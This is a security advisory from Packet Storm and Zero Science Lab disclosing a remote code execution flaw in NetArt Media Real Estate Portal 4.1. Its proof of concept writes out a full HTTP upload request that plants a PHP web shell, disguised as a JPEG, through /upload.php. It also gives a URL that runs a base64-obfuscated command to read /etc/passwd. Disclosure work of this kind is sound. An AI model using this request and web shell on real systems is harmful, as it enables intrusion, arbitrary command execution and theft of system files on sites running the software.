Real Estate Portal 4.1 Remote Code Execution

2016-05-26T00:00:00
ID PACKETSTORM:137203
Type packetstorm
Reporter Bikramaditya Guha
Modified 2016-05-26T00:00:00

Description

                                        
                                            `  
Real Estate Portal v4.1 Remote Code Execution Vulnerability  
  
  
Vendor: NetArt Media  
Product web page: http://www.netartmedia.net  
Affected version: 4.1  
  
Summary: Real Estate Portal is a software written in PHP,  
allowing you to launch powerful and professional looking  
real estate portals with rich functionalities for the private  
sellers, buyers and real estate agents to list properties  
for sale or rent, search in the database, show featured  
ads and many others. The private sellers can manage their  
ads at any time through their personal administration space.  
  
Desc: Real Estate Portal suffers from an arbitrary file upload  
vulnerability leading to an arbitrary PHP code execution. The  
vulnerability is caused due to the improper verification of  
uploaded files in '/upload.php' script thru the 'myfile' POST  
parameter. This can be exploited to execute arbitrary PHP code  
by uploading a malicious PHP script file with '.php' extension  
that will be stored in the '/uploads' directory.   
  
Tested on: nginx/1.10.0  
PHP/5.2.17  
MySQL/5.1.66  
  
  
Vulnerability discovered by Bikramaditya Guha aka "PhoenixX"  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5325  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5325.php  
  
  
06.05.2016  
  
---  
  
  
1. Arbitrary File Upload:  
-------------------------  
  
Parameter: myfile (POST)  
POC URL: http://localhost/uploads/Test.php?cmd=cat%20$%28echo%20L2V0Yy9wYXNzd2Q=%20|%20base64%20-d%29  
  
POST /upload.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Referer: http://localhost/USERS/index.php  
Content-Length: 419  
Content-Type: multipart/form-data; boundary=---------------------------8914507815764  
Cookie: PHPSESSID=7k4au5p4m0skscj4gjbfedfjs5; AuthU=demo%7Efe01ce2a7fbac8fafaed7c982a04e229%7E1462616214  
Connection: close  
  
-----------------------------8914507815764  
Content-Disposition: form-data; name="myfile"; filename="Test.php"  
Content-Type: image/jpeg  
  
<?php  
system($_GET['cmd']);   
?>  
  
-----------------------------8914507815764  
Content-Disposition: form-data; name=""  
  
undefined  
-----------------------------8914507815764  
Content-Disposition: form-data; name=""  
  
undefined  
-----------------------------8914507815764--  
`